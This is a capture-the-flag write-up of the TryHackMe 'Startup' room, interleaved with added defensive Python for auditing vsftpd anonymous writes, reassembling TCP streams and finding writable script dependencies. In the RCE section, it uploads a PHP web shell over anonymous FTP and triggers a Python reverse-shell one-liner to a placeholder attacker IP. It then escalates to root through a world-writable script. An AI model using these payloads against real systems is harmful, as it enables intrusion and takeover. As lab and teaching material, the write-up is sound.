Startup

Penthos
4 min read · Oct 10, 2021

Link: https://tryhackme.com/room/startup

Enumeration

Nmap

PORT   STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

FTP

With the anonymous user, I can get the files from the server.

I tested uploading a file to the FTP server's /ftp directory and it worked!

Port 80

Looking at the website we see no spice!

Some quick enumeration shows a /files path that is accessible and has similar contents to the FTP directory.
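Why an anonymous client can write to this server comes down to three vsftpd settings. The following is an added example (my code, not the room's or the author's) that parses a vsftpd.conf, applies vsftpd's documented defaults for keys that are absent, and reports what an anonymous client may write. Both sample configurations are constructed, since the room's real configuration is not shown; the anon_root path is likewise an assumption.

```python
"""Audit a vsftpd.conf for anonymous write access. Added example with constructed
sample configs; the room's real vsftpd configuration is not on the page."""

# Built-in defaults from vsftpd.conf(5) for the keys that matter here; a key that
# is absent from the file takes its default.
VSFTPD_DEFAULTS = {
    "anonymous_enable": True,
    "write_enable": False,
    "anon_upload_enable": False,
    "anon_mkdir_write_enable": False,
    "anon_other_write_enable": False,
}


def parse_vsftpd_conf(text):
    """Return the effective boolean settings, starting from vsftpd's defaults.
    vsftpd accepts YES/TRUE/1 and NO/FALSE/0 case-insensitively; later keys win."""
    settings = dict(VSFTPD_DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip().upper()
        if key in settings:
            settings[key] = value in ("YES", "TRUE", "1")
    return settings


def anonymous_write_findings(settings):
    """List what an anonymous client could write. write_enable is the master switch:
    without it, none of the anon_* write options take effect."""
    if not (settings["anonymous_enable"] and settings["write_enable"]):
        return []
    findings = []
    if settings["anon_upload_enable"]:
        findings.append("anonymous upload (STOR) is allowed")
    if settings["anon_mkdir_write_enable"]:
        findings.append("anonymous directory creation (MKD) is allowed")
    if settings["anon_other_write_enable"]:
        findings.append("anonymous delete/rename (DELE, RNFR/RNTO) is allowed")
    return findings


# Constructed: a configuration that behaves like the room's server, with the
# anonymous FTP root placed inside the web root (an assumption, not from the page).
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/www/html/files/ftp
"""

# Constructed: the same file with every anonymous write option switched off.
# write_enable stays on only so that authenticated users can still upload.
HARDENED_CONF = """\
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=NO
anon_mkdir_write_enable=NO
anon_other_write_enable=NO
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, anonymous_write_findings(parse_vsftpd_conf(conf)))
```

Even with uploads disabled, serving the FTP root from under the web document root means any file that does land there is reachable over HTTP, so the two directories are best kept apart.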

RCE

Let’s test RCE next with a simple shell.

Upload a php shell to the ftp server.

# Single quotes so the local shell does not expand $_GET before writing the file.
echo '<?php system($_GET["cmd"]); ?>' > file.php
ftp IP
cd ftp
put file.php
exit

Now visit the files directory and check for the file!

Nice, let's test RCE next.

Nice, it's working. Let's upgrade to a better shell.

Replace IP and PORT with your own.

http://10.10.193.7/files/ftp/file.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

We’re on! It's time to enumerate a bit…

Going to the root / directory we find some interesting files…

$ cat recipe.txt 
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

Then we find a folder called incidents with a suspicious.pcapng file.

I copy this over to my machine for further analysis.

# On the target machine, in the incidents folder
python3 -m http.server 8899
# On your own (attacking) machine
wget IP:8899/suspicious.pcapng

Then open the file in Wireshark

wireshark suspicious.pcapng

Right-click on a packet and select Follow > TCP Stream.

Then start to cycle through the stream data via the up and down arrows.

A few streams in, we can see someone getting a reverse shell too, and some more juicy info.
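Following a TCP stream is just reassembling each direction's payload in sequence-number order, which is worth seeing without the GUI when you are triaging a capture from an incidents folder. The block below is an added example (my code, not the author's or the room's): it builds a small constructed pcap in memory, reassembles the streams the way Wireshark's Follow TCP Stream does, including out-of-order and retransmitted segments, and flags FTP control streams that carry a login in the clear. The addresses, ports and the "alice"/"hunter2" login are constructed, not values from the room's capture.

```python
"""Reassemble TCP streams from a classic pcap (Ethernet link type) and flag cleartext
FTP logins. Added example with a constructed capture; nothing here is from the room."""
import re
import socket
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1


def tcp_frame(src, dst, sport, dport, seq, payload):
    """Build an Ethernet/IPv4/TCP frame. Checksums are left zero; parsers ignore them."""
    eth = b"\x00" * 12 + b"\x08\x00"                           # MACs + EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0,      # ports, seq, ack
                      5 << 4, 0x18, 8192, 0, 0)                # 20-byte header, PSH|ACK
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0, 0, 64, 6, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Wrap frames in a classic little-endian pcap container."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_frames(data):
    """Yield each captured frame from a classic pcap with Ethernet frames."""
    magic, _, _, _, _, _, linktype = struct.unpack_from("<IHHiIII", data, 0)
    if magic != PCAP_MAGIC or linktype != LINKTYPE_ETHERNET:
        raise ValueError("expected a little-endian classic pcap with Ethernet frames")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from("<IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def follow_tcp_streams(data):
    """Return {(src, sport, dst, dport): payload}, one entry per direction, with
    segments ordered by sequence number. Out-of-order segments are sorted into
    place and a retransmitted segment (same seq) is counted once."""
    segments = defaultdict(dict)                               # stream -> {seq: payload}
    for frame in iter_frames(data):
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                           # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        total_len = struct.unpack_from("!H", frame, 16)[0]
        if frame[23] != 6:
            continue                                           # not TCP
        src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
        tcp = frame[14 + ihl:14 + total_len]                   # drops Ethernet padding
        sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            segments[(src, sport, dst, dport)].setdefault(seq, payload)
    return {key: b"".join(p for _, p in sorted(segs.items()))
            for key, segs in segments.items()}


def cleartext_ftp_logins(streams):
    """Flag FTP control streams (to port 21) that carry USER and PASS in the clear.
    Returns (client_ip, username) pairs; the password itself is not returned."""
    hits = []
    for (src, _, _, dport), payload in streams.items():
        if dport != 21:
            continue
        text = payload.decode("ascii", "replace")
        user = re.search(r"^USER (\S+)", text, re.M)
        if user and re.search(r"^PASS \S+", text, re.M):
            hits.append((src, user.group(1)))
    return hits


# Constructed capture: one FTP login, written out of order and with a duplicate segment.
CLIENT, SERVER = "192.0.2.10", "198.51.100.5"
SAMPLE_PCAP = build_pcap([
    tcp_frame(SERVER, CLIENT, 21, 40000, 1, b"220 (vsFTPd 3.0.3)\r\n"),
    tcp_frame(CLIENT, SERVER, 40000, 21, 13, b"PASS hunter2\r\n"),    # arrives first
    tcp_frame(CLIENT, SERVER, 40000, 21, 1, b"USER alice\r\n"),
    tcp_frame(CLIENT, SERVER, 40000, 21, 1, b"USER alice\r\n"),       # retransmission
    tcp_frame(SERVER, CLIENT, 21, 40000, 21, b"331 Please specify the password.\r\n"),
])

if __name__ == "__main__":
    streams = follow_tcp_streams(SAMPLE_PCAP)
    for key, payload in streams.items():
        print(key, payload)
    print("cleartext logins:", cleartext_ftp_logins(streams))
```

The room's file is pcapng rather than classic pcap; the reassembly logic is the same, only the container parsing in iter_frames differs, and for a real capture you would hand the frames to this code from a pcapng reader or convert the file first.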

Using this new info, we can log in to the main account ‘lennie’ now.

User

Now we can log in as lennie and get the user flag.

Root

Looking at the files in lennie's folder reveals some interesting things, like a script and a startup list.

And in lennie's Documents folder, we can see a few more files of interest.

Looks like a few hints on what to put into the list file, maybe? Let’s try a few things.

From planner.sh we can see a call to another file:

#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

rwx? That’s weird; the w means we should have write access.

nano /etc/print.sh

Sure enough, we do! Time to get root!

Now run ./planner.sh and get a root shell :)
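The root shell comes from a chain of two facts: planner.sh runs with root's privileges and calls /etc/print.sh by absolute path, and /etc/print.sh is writable by other users. The following added example (my code, not the room's or the author's) is the audit a defender would run over such a script: it pulls the absolute paths the script executes, ignores redirection targets such as startup_list.txt, and reports any dependency that a user other than the script's owner could alter. The demo() helper rebuilds the planner.sh / print.sh chain in a temporary directory; the paths it uses are constructed, not the room's /etc/print.sh.

```python
"""Audit a privileged shell script for dependencies that other users can modify.
Added example; models the planner.sh -> print.sh chain with constructed paths."""
import os
import re
import stat
import tempfile

ABS_PATH = re.compile(r"(?<![\w./-])(/[\w./-]+)")


def invoked_paths(script_text):
    """Absolute paths the script body references, ignoring comments, the shebang,
    and redirection targets (files the script writes to rather than executes)."""
    found = []
    for line in script_text.splitlines():
        code = line.split("#", 1)[0]                       # drops '#!' and comments
        code = re.sub(r">+\s*\S+", "", code)               # drops '> /path/to/file'
        found.extend(ABS_PATH.findall(code))
    return found


def audit_script(script_path):
    """Return (path, reason) for each referenced path that a user other than the
    script's owner could alter. If the script runs as root and one of these files
    is writable by others, those others decide what root executes."""
    script_uid = os.stat(script_path).st_uid
    with open(script_path) as fh:
        body = fh.read()
    findings = []
    for path in invoked_paths(body):
        if not os.path.exists(path):
            findings.append((path, "missing: check who may create it in that directory"))
            continue
        st = os.stat(path)
        if st.st_uid != script_uid:
            findings.append((path, f"owned by uid {st.st_uid}, not the script owner"))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((path, f"group/world writable (mode {stat.S_IMODE(st.st_mode):o})"))
    return findings


def demo(dependency_mode):
    """Build the two-script chain in a temp dir with the given mode on the dependency
    and return the audit findings. Constructed layout, not the room's real paths."""
    with tempfile.TemporaryDirectory() as tmp:
        dep = os.path.join(tmp, "print.sh")
        with open(dep, "w") as fh:
            fh.write("#!/bin/bash\necho 'Done!'\n")
        os.chmod(dep, dependency_mode)
        planner = os.path.join(tmp, "planner.sh")
        with open(planner, "w") as fh:
            fh.write("#!/bin/bash\n"
                     f"echo $LIST > {tmp}/startup_list.txt\n"
                     f"{dep}\n")
        os.chmod(planner, 0o755)
        return audit_script(planner)


if __name__ == "__main__":
    print("mode 777:", demo(0o777))   # reports the writable dependency
    print("mode 755:", demo(0o755))   # clean
```

The fix on the box side is the mirror image of the audit: keep /etc/print.sh owned by root with mode 755 (no group or world write bit), and the same audit then returns nothing.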
